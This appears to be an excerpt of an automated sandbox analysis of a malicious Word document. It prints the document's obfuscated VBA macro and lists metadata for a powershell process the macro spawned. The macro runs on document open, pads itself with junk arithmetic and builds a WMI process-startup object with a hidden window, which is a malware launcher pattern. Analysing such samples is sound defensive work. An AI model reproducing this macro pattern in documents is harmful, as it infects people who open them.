                                Part of subcall function vzVjQz@pGv5GKCO: fHOdUi

                                Part of subcall function vzVjQz@pGv5GKCO: Log

                                Part of subcall function vzVjQz@pGv5GKCO: DMkD685A

                                Part of subcall function vzVjQz@pGv5GKCO: WtgzQ71y4

                                Part of subcall function vzVjQz@pGv5GKCO: xMfau5248

                                Part of subcall function vzVjQz@pGv5GKCO: ChrB

                                Part of subcall function vzVjQz@pGv5GKCO: pvOb

                                Part of subcall function vzVjQz@pGv5GKCO: Round

                                Part of subcall function vzVjQz@pGv5GKCO: npy

                                Part of subcall function vzVjQz@pGv5GKCO: KYoI8IEt

                                Part of subcall function vzVjQz@pGv5GKCO: oZgH7909

                                Part of subcall function vzVjQz@pGv5GKCO: CDbl

                                Part of subcall function vzVjQz@pGv5GKCO: qXfS4C1

                                Part of subcall function vzVjQz@pGv5GKCO: Dzmx6W5

                                Part of subcall function vzVjQz@pGv5GKCO: Log

                                Part of subcall function vzVjQz@pGv5GKCO: Chr

                                Part of subcall function vzVjQz@pGv5GKCO: gEpc77

                                Part of subcall function vzVjQz@pGv5GKCO: Oct

                                Part of subcall function vzVjQz@pGv5GKCO: oVggW7

                                Part of subcall function vzVjQz@pGv5GKCO: DkPTA3642

                                Part of subcall function vzVjQz@pGv5GKCO: Tan

                                Part of subcall function vzVjQz@pGv5GKCO: xoJtPK2

                                Part of subcall function vzVjQz@pGv5GKCO: Fix

                                Part of subcall function vzVjQz@pGv5GKCO: mNOJc3

                                Part of subcall function vzVjQz@pGv5GKCO: CInt

                                Part of subcall function vzVjQz@pGv5GKCO: LtXxD6e6

                                Part of subcall function vzVjQz@pGv5GKCO: mCtDS996

                                Part of subcall function vzVjQz@pGv5GKCO: SQxNb0rO

                                Part of subcall function vzVjQz@pGv5GKCO: DVTJJR1

                                Part of subcall function vzVjQz@pGv5GKCO: xBkGD

                                Part of subcall function vzVjQz@pGv5GKCO: ChrW

                                Part of subcall function vzVjQz@pGv5GKCO: YMtfHC

                                Part of subcall function vzVjQz@pGv5GKCO: Sin

                                Part of subcall function vzVjQz@pGv5GKCO: zpXA5n74

                                Part of subcall function vzVjQz@pGv5GKCO: hRdz53zQ

                                Part of subcall function vzVjQz@pGv5GKCO: EOPB1

                                Part of subcall function vzVjQz@pGv5GKCO: FoWIAw

                                Part of subcall function vzVjQz@pGv5GKCO: CByte

                                Part of subcall function vzVjQz@pGv5GKCO: fYSpVZg

                                Part of subcall function vzVjQz@pGv5GKCO: oWbX

                                Part of subcall function vzVjQz@pGv5GKCO: zwuF49r

                                Part of subcall function vzVjQz@pGv5GKCO: Create

                                Part of subcall function vzVjQz@pGv5GKCO: IEHlwRq

                                Part of subcall function vzVjQz@pGv5GKCO: W8KjQY

                                Part of subcall function vzVjQz@pGv5GKCO: l78zbRfV

                                Part of subcall function vzVjQz@pGv5GKCO: movZQtjv

                                Part of subcall function vzVjQz@pGv5GKCO: Rnd

                                Part of subcall function vzVjQz@pGv5GKCO: Cos

                                Part of subcall function vzVjQz@pGv5GKCO: EAMc9D

                                Part of subcall function vzVjQz@pGv5GKCO: Log

                                Part of subcall function vzVjQz@pGv5GKCO: DMkD685A

                                Part of subcall function vzVjQz@pGv5GKCO: WtgzQ71y4

                                Part of subcall function vzVjQz@pGv5GKCO: xMfau5248

                                Part of subcall function vzVjQz@pGv5GKCO: ChrB

                                Part of subcall function vzVjQz@pGv5GKCO: pvOb

                                Part of subcall function vzVjQz@pGv5GKCO: Round

                                Part of subcall function vzVjQz@pGv5GKCO: npy

                                Part of subcall function vzVjQz@pGv5GKCO: KYoI8IEt

                                Part of subcall function vzVjQz@pGv5GKCO: oZgH7909

                                Part of subcall function vzVjQz@pGv5GKCO: CDbl

                                Part of subcall function vzVjQz@pGv5GKCO: qXfS4C1

                                Part of subcall function vzVjQz@pGv5GKCO: Dzmx6W5

                                Part of subcall function vzVjQz@pGv5GKCO: Log

                                Part of subcall function vzVjQz@pGv5GKCO: Chr

                                Part of subcall function vzVjQz@pGv5GKCO: gEpc77

                                Part of subcall function vzVjQz@pGv5GKCO: Oct

                                Part of subcall function vzVjQz@pGv5GKCO: oVggW7

                                Part of subcall function vzVjQz@pGv5GKCO: DkPTA3642

                                Part of subcall function vzVjQz@pGv5GKCO: Tan

                                Part of subcall function vzVjQz@pGv5GKCO: xoJtPK2

                                Part of subcall function vzVjQz@pGv5GKCO: Fix

                                Part of subcall function vzVjQz@pGv5GKCO: mNOJc3

                                Part of subcall function vzVjQz@pGv5GKCO: CInt

                                Part of subcall function vzVjQz@pGv5GKCO: LtXxD6e6

                                Part of subcall function vzVjQz@pGv5GKCO: mCtDS996

                                Part of subcall function vzVjQz@pGv5GKCO: SQxNb0rO

                                Part of subcall function vzVjQz@pGv5GKCO: DVTJJR1

                                Part of subcall function vzVjQz@pGv5GKCO: xBkGD

                                Part of subcall function vzVjQz@pGv5GKCO: ChrW

                                Part of subcall function vzVjQz@pGv5GKCO: EkbiAj

                                Part of subcall function vzVjQz@pGv5GKCO: Sin

                                Part of subcall function vzVjQz@pGv5GKCO: zpXA5n74

                                Part of subcall function vzVjQz@pGv5GKCO: hRdz53zQ

                                Part of subcall function vzVjQz@pGv5GKCO: EOPB1

                                Part of subcall function vzVjQz@pGv5GKCO: XVBccQd

                                Part of subcall function vzVjQz@pGv5GKCO: CByte

                                Part of subcall function vzVjQz@pGv5GKCO: fYSpVZg

                                Part of subcall function vzVjQz@pGv5GKCO: oWbX

                                Part of subcall function vzVjQz@pGv5GKCO: WR_wPr3Y

                                XVDjpH3

                                Rnd

                                Cos

                                BaBpfF

                                Log

                                DMkD685A

                                WtgzQ71y4

                                xMfau5248

                                ChrB

                                pvOb

                                Round

                                npy

                                KYoI8IEt

                                oZgH7909

                                CDbl

                                qXfS4C1

                                Dzmx6W5

                                Log

                                Chr

                                gEpc77

                                Oct

                                oVggW7

                                DkPTA3642

                                Tan

                                xoJtPK2

                                Fix

                                mNOJc3

                                CInt

                                LtXxD6e6

                                mCtDS996

                                SQxNb0rO

                                DVTJJR1

                                xBkGD

                                ChrW

                                qlk6q2_

                                Sin

                                zpXA5n74

                                hRdz53zQ

                                EOPB1

                                CTLvSTn

                                CByte

                                fYSpVZg

                                oWbX

                                KWPvOvJS

                                LineInstructionMeta Information
                                2

                                Sub autoopen()

                                3

                                On Error Resume Next

                                executed
                                5

                                wuhj5u = (QWhXZiV + Rnd(986) + (4222 + Cos(8992 * Rnd(kf8CcM) / 83 + Log(9130)) * 2 + 85))

                                QWhXZiV

                                Rnd

                                Cos

                                kf8CcM

                                Log

                                6

                                For Each iArs14 in DMkD685A

                                DMkD685A

                                7

                                For Each BVrY355a in WtgzQ71y4

                                WtgzQ71y4

                                8

                                LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(892 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)

                                xMfau5248

                                ChrB

                                pvOb

                                Round

                                npy

                                KYoI8IEt

                                oZgH7909

                                CDbl

                                qXfS4C1

                                Dzmx6W5

                                Log

                                Chr

                                gEpc77

                                Oct

                                oVggW7

                                DkPTA3642

                                Tan

                                xoJtPK2

                                Fix

                                mNOJc3

                                CInt

                                LtXxD6e6

                                mCtDS996

                                SQxNb0rO

                                DVTJJR1

                                xBkGD

                                9

                                Next

                                WtgzQ71y4

                                10

                                Do

                                fYSpVZg

                                oWbX

                                11

                                Qa9atL = 512 * ChrW(VlHilWoa) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (MEz37an4 + CByte(693))

                                ChrW

                                VlHilWoa

                                Sin

                                zpXA5n74

                                hRdz53zQ

                                EOPB1

                                MEz37an4

                                CByte

                                12

                                Loop Until fYSpVZg Eqv oWbX

                                fYSpVZg

                                oWbX

                                13

                                Next

                                DMkD685A

                                14

                                Set IFjhja = wJlK3r

                                wJlK3r

                                15

                                vzVjQz

                                16

                                On Error Resume Next

                                18

                                XjhCsH5t = (XVDjpH3 + Rnd(280) + (4222 + Cos(8992 * Rnd(BaBpfF) / 83 + Log(9130)) * 2 + 85))

                                XVDjpH3

                                Rnd

                                Cos

                                BaBpfF

                                Log

                                19

                                For Each iArs14 in DMkD685A

                                DMkD685A

                                20

                                For Each BVrY355a in WtgzQ71y4

                                WtgzQ71y4

                                21

                                LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(444 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)

                                xMfau5248

                                ChrB

                                pvOb

                                Round

                                npy

                                KYoI8IEt

                                oZgH7909

                                CDbl

                                qXfS4C1

                                Dzmx6W5

                                Log

                                Chr

                                gEpc77

                                Oct

                                oVggW7

                                DkPTA3642

                                Tan

                                xoJtPK2

                                Fix

                                mNOJc3

                                CInt

                                LtXxD6e6

                                mCtDS996

                                SQxNb0rO

                                DVTJJR1

                                xBkGD

                                22

                                Next

                                WtgzQ71y4

                                23

                                Do

                                fYSpVZg

                                oWbX

                                24

                                hw8NNlz = 512 * ChrW(qlk6q2_) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (CTLvSTn + CByte(693))

                                ChrW

                                qlk6q2_

                                Sin

                                zpXA5n74

                                hRdz53zQ

                                EOPB1

                                CTLvSTn

                                CByte

                                25

                                Loop Until fYSpVZg Eqv oWbX

                                fYSpVZg

                                oWbX

                                26

                                Next

                                DMkD685A

                                27

                                Set Za6C90f = KWPvOvJS

                                KWPvOvJS

                                28

                                End Sub

                                Function u0rrBWd, APIs: 186, Strings: 0, Number of lines: 48, Relevance: 280.548
                                APIsMeta Information

                                UvwY_w2

                                Rnd

                                Cos

                                REjNZU

                                Log

                                DMkD685A

                                WtgzQ71y4

                                xMfau5248

                                ChrB

                                pvOb

                                Round

                                npy

                                KYoI8IEt

                                oZgH7909

                                CDbl

                                qXfS4C1

                                Dzmx6W5

                                Log

                                Chr

                                gEpc77

                                Oct

                                oVggW7

                                DkPTA3642

                                Tan

                                xoJtPK2

                                Fix

                                mNOJc3

                                CInt

                                LtXxD6e6

                                mCtDS996

                                SQxNb0rO

                                DVTJJR1

                                xBkGD

                                ChrW

                                H49MOD

                                Sin

                                zpXA5n74

                                hRdz53zQ

                                EOPB1

                                zYE0jXuq

                                CByte

                                fYSpVZg

                                oWbX

                                CPCwcG

                                CreateObject

                                		CreateObject("winmgmts:Win32_ProcessStartup")

                                z6zhmi

                                hjL90Njk

                                YfUK5MYA

                                CRKhA_jf

                                Rnd

                                Cos

                                T26ck3A

                                Log

                                DMkD685A

                                WtgzQ71y4

                                xMfau5248

                                ChrB

                                pvOb

                                Round

                                npy

                                KYoI8IEt

                                oZgH7909

                                CDbl

                                qXfS4C1

                                Dzmx6W5

                                Log

                                Chr

                                gEpc77

                                Oct

                                oVggW7

                                DkPTA3642

                                Tan

                                xoJtPK2

                                Fix

                                mNOJc3

                                CInt

                                LtXxD6e6

                                mCtDS996

                                SQxNb0rO

                                DVTJJR1

                                xBkGD

                                ChrW

                                krL1ZhNF

                                Sin

                                zpXA5n74

                                hRdz53zQ

                                EOPB1

                                q7tYSW

                                CByte

                                fYSpVZg

                                oWbX

                                STzBUj60

                                idm89H

                                t_4HtlR2

                                GcQ0OP

                                E9KJrnE

                                riC9rvum

                                Swt5C6J5

                                R5QGHj5F

                                Rnd

                                Cos

                                l2NHvVM

                                Log

                                DMkD685A

                                WtgzQ71y4

                                xMfau5248

                                ChrB

                                pvOb

                                Round

                                npy

                                KYoI8IEt

                                oZgH7909

                                CDbl

                                qXfS4C1

                                Dzmx6W5

                                Log

                                Chr

                                gEpc77

                                Oct

                                oVggW7

                                DkPTA3642

                                Tan

                                xoJtPK2

                                Fix

                                mNOJc3

                                CInt

                                LtXxD6e6

                                mCtDS996

                                SQxNb0rO

                                DVTJJR1

                                xBkGD

                                ChrW

                                Vt1lB0J

                                Sin

                                zpXA5n74

                                hRdz53zQ

                                EOPB1

                                L_w6MRPL

                                CByte

                                fYSpVZg

                                oWbX

                                jUdkfc5

                                MYDp39w

                                Rnd

                                Cos

                                drcmu54

                                Log

                                DMkD685A

                                WtgzQ71y4

                                xMfau5248

                                ChrB

                                pvOb

                                Round

                                npy

                                KYoI8IEt

                                oZgH7909

                                CDbl

                                qXfS4C1

                                Dzmx6W5

                                Log

                                Chr

                                gEpc77

                                Oct

                                oVggW7

                                DkPTA3642

                                Tan

                                xoJtPK2

                                Fix

                                mNOJc3

                                CInt

                                LtXxD6e6

                                mCtDS996

                                SQxNb0rO

                                DVTJJR1

                                xBkGD

                                ChrW

                                Xi8u3HTl

                                Sin

                                zpXA5n74

                                hRdz53zQ

                                EOPB1

                                b67OEj8i

                                CByte

                                fYSpVZg

                                oWbX

                                zAZIDWEn

                                LineInstructionMeta Information
                                29

                                Function u0rrBWd()

                                30

                                On Error Resume Next

                                executed
                                32

                                w0tVAR = (UvwY_w2 + Rnd(842) + (4222 + Cos(8992 * Rnd(REjNZU) / 83 + Log(9130)) * 2 + 85))

                                UvwY_w2

                                Rnd

                                Cos

                                REjNZU

                                Log

                                33

                                For Each iArs14 in DMkD685A

                                DMkD685A

                                34

                                For Each BVrY355a in WtgzQ71y4

                                WtgzQ71y4

                                35

                                LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(927 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)

                                xMfau5248

                                ChrB

                                pvOb

                                Round

                                npy

                                KYoI8IEt

                                oZgH7909

                                CDbl

                                qXfS4C1

                                Dzmx6W5

                                Log

                                Chr

                                gEpc77

                                Oct

                                oVggW7

                                DkPTA3642

                                Tan

                                xoJtPK2

                                Fix

                                mNOJc3

                                CInt

                                LtXxD6e6

                                mCtDS996

                                SQxNb0rO

                                DVTJJR1

                                xBkGD

                                36

                                Next

                                WtgzQ71y4

                                37

                                Do

                                fYSpVZg

                                oWbX

                                38

                                DEdXV9 = 512 * ChrW(H49MOD) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (zYE0jXuq + CByte(693))

                                ChrW

                                H49MOD

                                Sin

                                zpXA5n74

                                hRdz53zQ

                                EOPB1

                                zYE0jXuq

                                CByte

                                39

                                Loop Until fYSpVZg Eqv oWbX

                                fYSpVZg

                                oWbX

                                40

                                Next

                                DMkD685A

                                41

                                Set T2IBjoKJ = CPCwcG

                                CPCwcG

                                42

                                Set u0rrBWd = CreateObject(z6zhmi + ThisDocument.hjL90Njk.Caption + "Startup" + YfUK5MYA)

                                CreateObject("winmgmts:Win32_ProcessStartup")

                                z6zhmi

                                hjL90Njk

                                YfUK5MYA

                                executed
                                43

                                On Error Resume Next

                                45

                                dlcvKIwk = (CRKhA_jf + Rnd(192) + (4222 + Cos(8992 * Rnd(T26ck3A) / 83 + Log(9130)) * 2 + 85))

                                CRKhA_jf

                                Rnd

                                Cos

                                T26ck3A

                                Log

                                46

                                For Each iArs14 in DMkD685A

                                DMkD685A

                                47

                                For Each BVrY355a in WtgzQ71y4

                                WtgzQ71y4

                                48

                                LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(11 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)

                                xMfau5248

                                ChrB

                                pvOb

                                Round

                                npy

                                KYoI8IEt

                                oZgH7909

                                CDbl

                                qXfS4C1

                                Dzmx6W5

                                Log

                                Chr

                                gEpc77

                                Oct

                                oVggW7

                                DkPTA3642

                                Tan

                                xoJtPK2

                                Fix

                                mNOJc3

                                CInt

                                LtXxD6e6

                                mCtDS996

                                SQxNb0rO

                                DVTJJR1

                                xBkGD

                                49

                                Next

                                WtgzQ71y4

                                50

                                Do

                                fYSpVZg

                                oWbX

                                51

                                rDhczOL0 = 512 * ChrW(krL1ZhNF) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (q7tYSW + CByte(693))

                                ChrW

                                krL1ZhNF

                                Sin

                                zpXA5n74

                                hRdz53zQ

                                EOPB1

                                q7tYSW

                                CByte

                                52

                                Loop Until fYSpVZg Eqv oWbX

                                fYSpVZg

                                oWbX

                                53

                                Next

                                DMkD685A

                                54

                                Set AKSIPq18 = STzBUj60

                                STzBUj60

                                55

                                u0rrBWd.ShowWindow! = idm89H + t_4HtlR2 + GcQ0OP + E9KJrnE + riC9rvum + Swt5C6J5

                                idm89H

                                t_4HtlR2

                                GcQ0OP

                                E9KJrnE

                                riC9rvum

                                Swt5C6J5

                                58

                                On Error Resume Next

                                60

                                Bq4RTMp1 = (R5QGHj5F + Rnd(894) + (4222 + Cos(8992 * Rnd(l2NHvVM) / 83 + Log(9130)) * 2 + 85))

                                R5QGHj5F

                                Rnd

                                Cos

                                l2NHvVM

                                Log

                                61

                                For Each iArs14 in DMkD685A

                                DMkD685A

                                62

                                For Each BVrY355a in WtgzQ71y4

                                WtgzQ71y4

                                63

                                LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(262 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)

                                xMfau5248

                                ChrB

                                pvOb

                                Round

                                npy

                                KYoI8IEt

                                oZgH7909

                                CDbl

                                qXfS4C1

                                Dzmx6W5

                                Log

                                Chr

                                gEpc77

                                Oct

                                oVggW7

                                DkPTA3642

                                Tan

                                xoJtPK2

                                Fix

                                mNOJc3

                                CInt

                                LtXxD6e6

                                mCtDS996

                                SQxNb0rO

                                DVTJJR1

                                xBkGD

                                64

                                Next

                                WtgzQ71y4

                                65

                                Do

                                fYSpVZg

                                oWbX

                                66

                                YsHK1izD = 512 * ChrW(Vt1lB0J) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (L_w6MRPL + CByte(693))

                                ChrW

                                Vt1lB0J

                                Sin

                                zpXA5n74

                                hRdz53zQ

                                EOPB1

                                L_w6MRPL

                                CByte

                                67

                                Loop Until fYSpVZg Eqv oWbX

                                fYSpVZg

                                oWbX

                                68

                                Next

                                DMkD685A

                                69

                                Set b0_jB1EO = jUdkfc5

                                jUdkfc5

                                70

                                On Error Resume Next

                                72

                                JvKCRbY = (MYDp39w + Rnd(829) + (4222 + Cos(8992 * Rnd(drcmu54) / 83 + Log(9130)) * 2 + 85))

                                MYDp39w

                                Rnd

                                Cos

                                drcmu54

                                Log

                                73

                                For Each iArs14 in DMkD685A

                                DMkD685A

                                74

                                For Each BVrY355a in WtgzQ71y4

                                WtgzQ71y4

                                75

                                LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(816 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)

                                xMfau5248

                                ChrB

                                pvOb

                                Round

                                npy

                                KYoI8IEt

                                oZgH7909

                                CDbl

                                qXfS4C1

                                Dzmx6W5

                                Log

                                Chr

                                gEpc77

                                Oct

                                oVggW7

                                DkPTA3642

                                Tan

                                xoJtPK2

                                Fix

                                mNOJc3

                                CInt

                                LtXxD6e6

                                mCtDS996

                                SQxNb0rO

                                DVTJJR1

                                xBkGD

                                76

                                Next

                                WtgzQ71y4

                                77

                                Do

                                fYSpVZg

                                oWbX

                                78

                                btqQZCP = 512 * ChrW(Xi8u3HTl) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (b67OEj8i + CByte(693))

                                ChrW

                                Xi8u3HTl

                                Sin

                                zpXA5n74

                                hRdz53zQ

                                EOPB1

                                b67OEj8i

                                CByte

                                79

                                Loop Until fYSpVZg Eqv oWbX

                                fYSpVZg

                                oWbX

                                80

                                Next

                                DMkD685A

                                81

                                Set AQK7_3d = zAZIDWEn

                                zAZIDWEn

                                82

                                End Function

                                Reset < >

                                  Analysis Process: powershell.exe PID: 5596 Parent PID: 4940 powershell.exeCOMMON

                                  Executed Functions

                                  Function 00007FFAF145207B, Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.250542819.00007FFAF1450000.00000040.00000001.sdmp, Offset: 00007FFAF1450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffaf1450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: !`_^
                                  • API String ID: 0-3236815119
                                  • Opcode ID: 62bb092469725462870e75a1848bea1b5e4c0c7446d93666461a9f046d193412
                                  • Instruction ID: 2053320c4bd968a77ccd821f85eec4f2faafb578bf5aed20e8323ee4d9f34ea8
                                  • Opcode Fuzzy Hash: 62bb092469725462870e75a1848bea1b5e4c0c7446d93666461a9f046d193412
                                  • Instruction Fuzzy Hash: C6713BB690C7958FD706D72CD8924E57FA0FF9332571840BFE189CB1A3DA186846C791
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00007FFAF15210DA, Relevance: .6, Instructions: 602COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.250575170.00007FFAF1520000.00000040.00000001.sdmp, Offset: 00007FFAF1520000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffaf1520000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ec8cd47fbf1f975ef9e9dbb3d0495d0237ca3d8d241c905d7337cb6828f897fc
                                  • Instruction ID: f0da2bb5a0512768051222a1cf1c6b77eedeee33204e9fc3f067a17d0337c53a
                                  • Opcode Fuzzy Hash: ec8cd47fbf1f975ef9e9dbb3d0495d0237ca3d8d241c905d7337cb6828f897fc
                                  • Instruction Fuzzy Hash: C702D26290DBC60FEB96976858A51B67FE5EF53210B0841FFE09DCB1E3DA1C5C058352
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00007FFAF1452110, Relevance: .2, Instructions: 176COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.250542819.00007FFAF1450000.00000040.00000001.sdmp, Offset: 00007FFAF1450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffaf1450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 88b5107726a25c0b0db2f81ec1bdeef1ce59869dff5d0679c49ca80ecd7b07b1
                                  • Instruction ID: c88c4445953c68ab282d1d5d5142c8942fe2a47fd82a7d36c013fa9b0140a6ce
                                  • Opcode Fuzzy Hash: 88b5107726a25c0b0db2f81ec1bdeef1ce59869dff5d0679c49ca80ecd7b07b1
                                  • Instruction Fuzzy Hash: 2B5124B250C7458FD749DB1CD8928A57BE0FF96329B1400BFE089CB193EA15A8468781
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00007FFAF1521344, Relevance: .1, Instructions: 97COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.250575170.00007FFAF1520000.00000040.00000001.sdmp, Offset: 00007FFAF1520000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffaf1520000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ef57fb143d5e7c8393dbd16742db59494323d2da0476196331f8bdfa349baba4
                                  • Instruction ID: 1d367efe05bf31d94435c4ab5220f0162a136948094593cd29bb81ea53669c95
                                  • Opcode Fuzzy Hash: ef57fb143d5e7c8393dbd16742db59494323d2da0476196331f8bdfa349baba4
                                  • Instruction Fuzzy Hash: F1210463E0DAC60FEBAA9728589107676C7EF92650B5840BFE05CCB6E2DE1CEC054341
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00007FFAF1451894, Relevance: .1, Instructions: 85COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.250542819.00007FFAF1450000.00000040.00000001.sdmp, Offset: 00007FFAF1450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffaf1450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f8729617b11d5e8aba81009fd524d7996faa929feb59eeec0466d42eb3f08557
                                  • Instruction ID: d26b9d06fa5c93dcacb8318d5f5e5df805e2eb7ac0ff05e592ec065d5c19d548
                                  • Opcode Fuzzy Hash: f8729617b11d5e8aba81009fd524d7996faa929feb59eeec0466d42eb3f08557
                                  • Instruction Fuzzy Hash: 2721C47051CB494FD74AEF18D0916B9B7E0FF96354F14097EE09EC71A6DB2AA842CB01
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00007FFAF1452939, Relevance: .1, Instructions: 81COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.250542819.00007FFAF1450000.00000040.00000001.sdmp, Offset: 00007FFAF1450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffaf1450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 511cc8607aafeb9de13fd8e55c22502dee7af1ab7055fc37abfb7dcd86d4d48b
                                  • Instruction ID: 9aaf69ca3e94bd71d54649076a67f8e789db90626aba9523a5fdac70bfce72df
                                  • Opcode Fuzzy Hash: 511cc8607aafeb9de13fd8e55c22502dee7af1ab7055fc37abfb7dcd86d4d48b
                                  • Instruction Fuzzy Hash: B4210571A1891D8FDF99EB58C441EA977B1FFA9344F1441AAD00DD7296CB24EC82CBC1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00007FFAF1452268, Relevance: .0, Instructions: 40COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.250542819.00007FFAF1450000.00000040.00000001.sdmp, Offset: 00007FFAF1450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffaf1450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9eb6c2154958ac65bde769ece28f0aa23e9f8c8a113df31ff2edcb07dbe976ef
                                  • Instruction ID: 3cc9cd0d5d2da5eb6182bf26ed711697aadc5a74a3f460fdebedd01293ebce0c
                                  • Opcode Fuzzy Hash: 9eb6c2154958ac65bde769ece28f0aa23e9f8c8a113df31ff2edcb07dbe976ef
                                  • Instruction Fuzzy Hash: 12F0307276C6044F9B5C9A0CF8439B573D1E789224B40016FE48AC2696E917B8428685
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 00007FFAF1450CAA, Relevance: .2, Instructions: 234COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.250542819.00007FFAF1450000.00000040.00000001.sdmp, Offset: 00007FFAF1450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffaf1450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ae688af8e86f7a4592fefed535c3016b7e9d1328aeea3fb5c06245b4cb75228c
                                  • Instruction ID: 163f565d1e73101acadd041340ba1bac0e338e01006a32e20cc0222833722fd3
                                  • Opcode Fuzzy Hash: ae688af8e86f7a4592fefed535c3016b7e9d1328aeea3fb5c06245b4cb75228c
                                  • Instruction Fuzzy Hash: F371FCE7D0D3928FE757976C98660E93FA0EF5326970940B3D4984F4E3EF09280A9691
                                  Uniqueness

                                  Uniqueness Score: -1.00%